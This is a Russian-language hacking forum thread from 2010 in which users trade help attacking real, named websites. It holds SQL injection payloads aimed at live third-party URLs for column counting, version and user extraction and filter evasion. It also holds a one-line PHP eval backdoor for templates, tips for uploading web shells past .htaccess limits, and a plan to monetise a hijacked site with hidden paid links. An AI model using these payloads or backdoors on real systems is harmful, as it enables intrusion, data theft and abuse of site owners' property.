Здравствуйте , насчет аплоада шеллов , разрешена заливка php вместо картинки , все бы хорошо только при обращении вместо выполнения , браузер предлагает скачать файл. Насколько я понимаю , что то замечательное прописано в .htaccess в папке c изображениями , собстно сабж , что можно придумать.
killrok6
28.11.2010, 02:18
В php нашел такой код:
if(isset($_GET["bid"])) {
$id_type = "bid";
$id = $_GET["bid"];
} else {
$id_type = "bhid";
$id = $_GET["bhid"];
}
Вид ссылки:
http://localhost/ban_details.php?bid=99999
Есть ли тут sql injection?
Или какого вида должен быть уязвимый код?)
killrok6 said:
В php нашел такой код:
Вид ссылки:
http://localhost/ban_details.php?bid=99999
Есть ли тут sql injection?
Или какого вида должен быть уязвимый код?)
Смотря что идет дальше, есть ли проверка типов или фильтр.
Можешь глянуть статью про этот движок /thread121710-amxbans.html
killrok6
28.11.2010, 03:24
Наткнулся на ошибку:
Fatal error:
Error: 'alert()' is not an integer
textpattern/include/txp_article.php:360 assert_int()
textpattern/include/txp_article.php:54 article_edit()
textpattern/index.php:143 include()
in /home/vzritcom/public_html/textpattern/lib/txplib_misc.php on line 2348
Есть ли тут уязвимость?
GIG said:
Здравствуйте , насчет аплоада шеллов , разрешена заливка php вместо картинки , все бы хорошо только при обращении вместо выполнения , браузер предлагает скачать файл. Насколько я понимаю , что то замечательное прописано в .htaccess в папке c изображениями , собстно сабж , что можно придумать.
Ты юзаешь ВСО?
Попробуй мад99, было такое раз помогло, хотя не точно хз что там у тебя...
Возможно там есть хтацесс запрещающий исполнение, попробуй залиться в другую папку, вариантов много =)
не справишься кидай линк, чем сможем тем поможем =)
сколько здесь колонок ))?
http://www.artistfacts.com/detail.php?id=2+order+by+1%20--
http://www.artistfacts.com/detail.php?id=2+order+by+1000%20--
http://www.artistfacts.com/detail.php?id=2+order+by+1000000%20--
сколько здесь колонок ))?
http://www.artistfacts.com/detail.php?id=2+order+by+1%20--
http://www.artistfacts.com/detail.php?id=2+order+by+1000%20--
http://www.artistfacts.com/detail.php?id=2+order+by+1000000%20--
с чего ты взял что там инъекция
MastaBass1
29.11.2010, 16:52
Такой вопрос, имеется сайт с хорошими показателями тиц и pr, доступ к админки вытащил из sql inj.
Возможно ли впихнуть рекламу( например sape), для заработка с него. Как сделать чтоб ее не запилили, может шел залить, как, какой? Спокойно выполняются js скрипты, можно с помощью них загнать шел на сервер, или еще как?
C помощью js шелл не зальешь, тк они выполняются на стороне клиента, залить можно (наверное), какой? Да который больше нравится, можно засунуть рекламу через шелл...
MastaBass1 said:
Такой вопрос, имеется сайт с хорошими показателями тиц и pr, доступ к админки вытащил из sql inj.
Возможно ли впихнуть рекламу( например sape), для заработка с него. Как сделать чтоб ее не запилили, может шел залить, как, какой? Спокойно выполняются js скрипты, можно с помощью них загнать шел на сервер, или еще как?
Сказал бы,что за кмс,если это не самопис то из админки известны способы заливки.
Если самопис какой-то,1.)ищи заливку картинок и пробуй загрузить шелл , 2.)Ищи место куда можно вставить пхп код и чтоб он исполнялся,например если в шаблонах разрешен пхп,то вставляешь туда пхп код например eval(stripslashes($_GET[e])); вызываешь пхпинфо,а дальше уже смотришь по ситуации...
MastaBass1
29.11.2010, 17:30
~d0s~ said:
Сказал бы,что за кмс,если это не самопис то из админки известны способы заливки.
Если самопис какой-то,1.)ищи заливку картинок и пробуй загрузить шелл , 2.)Ищи место куда можно вставить пхп код и чтоб он исполнялся,например если в шаблонах разрешен пхп,то вставляешь туда пхп код например eval(stripslashes($_GET[e])); вызываешь пхпинфо,а дальше уже смотришь по ситуации...
TrinetCMS, тоесть пробывать заливать скрипты через всевозможные формы загрузки( фотографии, видео и т.д.). Так а не запилят банер? Есть смысл делать это через Sape, просто при анализе это сайта через http://www.cy-pr.com/, говорят что сапа отвалит больше 1000 $ , вот и решил попробовать.
А какой шелл посоветуете, есть какие-нибудь факи по ним?
MastaBass1 said:
TrinetCMS, тоесть пробывать заливать скрипты через всевозможные формы загрузки( фотографии, видео и т.д.). Так а не запилят банер? Есть смысл делать это через Sape, просто при анализе это сайта через http://www.cy-pr.com/, говорят что сапа отвалит больше 1000 $ , вот и решил попробовать.
А какой шелл посоветуете, есть какие-нибудь факи по ним?
губозакататель еще дадут бесплатный никелированный, если сапа даст больше 1к $, значит сайт с высоким тиц-ем, скорее всего он в сапе уже есть, если нет то за ним следят и спалят появление всяких ссылок очень быстро..
MastaBass1
29.11.2010, 19:17
Gorev said:
губозакататель еще дадут бесплатный никелированный, если сапа даст больше 1к $, значит сайт с высоким тиц-ем, скорее всего он в сапе уже есть, если нет то за ним следят и спалят появление всяких ссылок очень быстро..
Яша 450
Google PageRank (PR) 5
Его нет в сапе, а если умело, может и не запилят?
MastaBass1 said:
Яша 450
Google PageRank (PR) 5
Его нет в сапе, а если умело, может и не запилят?
если на сайте нет нормального админа, а только контент-менеджер который дальше админки ничего не знает то можно попробовать скрыть в шаблоне ссылки через display:none, но все же это палево все равно. вдруг завтра как раз решат поставить сапу на сайт а тут хоп - сайт уже в сапе ))
MastaBass1
29.11.2010, 19:54
Чакэ said:
если на сайте нет нормального админа, а только контент-менеджер который дальше админки ничего не знает то можно попробовать скрыть в шаблоне ссылки через display:none, но все же это палево все равно. вдруг завтра как раз решат поставить сапу на сайт а тут хоп - сайт уже в сапе ))
Ну посмотрим, а что такое display:none, типо реклама вида Hide, так сапа заблочит за это?!
MastaBass1
29.11.2010, 20:30
Ладно, такой вопрос, если есть доступ через шел к папке phpmyadmin, а из адресной строки доступа нет(403 Forbidden), как открыть доступ к этой директории?
MastaBass1 said:
Ладно, такой вопрос, если есть доступ через шел к папке phpmyadmin, а из адресной строки доступа нет(403 Forbidden), как открыть доступ к этой директории?
в этой папке или в корне есть .htaccess? может через него доступ закрыт.
MastaBass1
29.11.2010, 20:50
Чакэ said:
в этой папке или в корне есть .htaccess? может через него доступ закрыт.
Понял, поищу, спасибо!
Делаю запрос
id=2'+union+select+1--
Выходит такая ошибка:
Warning: array_merge() [function.array-merge]: Argument #2 is not an array
Если делаю так
id=2+union+select+1--
Отображается страница с записями
если перед 2 минус ставлю
id=-2+union+select+1--
getData: Incorrect table name '' SQL=SELECT DISTINCT `` AS blabla FROM `` LIMIT 0, 10
Какой запрос сформировать?
Интересно что даже если делаю 1,2,3,4 и т.д.
id=2+union+select+1,2,3,4--
данные отображаются
//обсуждение таких вопросов без указания линков, не эффективно..иногда даже без результата {модер}
Kiberpank
30.11.2010, 15:40
Что за сайт-то?
у меня вопрос
www.truvor.ru/news.php?%20id_new=-91+union+select%20+1,2,3,4,5,6,7,8,9
как вывисти какиенибуть данные если всегда отображается только текст?
qaz said:
у меня вопрос
www.truvor.ru/news.php?%20id_new=-91+union+select%20+1,2,3,4,5,6,7,8,9
как вывисти какиенибуть данные если всегда отображается только текст?
Смотри в title
http://www.truvor.ru/news.php?id_new=-91+union+select+1,2,3,4,version(),6,7,8,9--
Не получается вывести имя юзера.
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+user,null,null,null,null,null,null,null,null, null,null,null+from+sys.dual--
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+sys.login_user,null,null,null,null,null,null, null,null,null,null,null+from+sys.dual--
apoclepsis
01.12.2010, 04:56
хи алл! народ помогите с Joomla 1.5.9 - сил ужо нет( ,какие у него дыры , хотяб статейку подкинте.
спс)
Делаю запрос
-5+union+select+1,version()--
Все отлично показывает
А на вот такой
-5+union+select+1,version()+from+users--
говорит
Bad Request
Your browser sent a request that this server could not understand.
Как я понял тут фильтруется from или набодобие того как это обойти?
apoclepsis said:
хи алл! народ помогите с Joomla 1.5.9 - сил ужо нет( ,какие у него дыры , хотяб статейку подкинте.
спс)
а погуглить влом?
noviyuser said:
Делаю запрос
Все отлично показывает
А на вот такой
говорит
Как я понял тут фильтруется from или набодобие того как это обойти?
попробуй указать базу где находится табличка users, если и так не сканает то скорее всего фильтр на from, попробуй подзапросами...
Gorev said:
попробуй указать базу где находится табличка users, если и так не сканает то скорее всего фильтр на from, попробуй подзапросами...
Табличку указывал не проканало, а как подзапросы делать можно примерчик?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot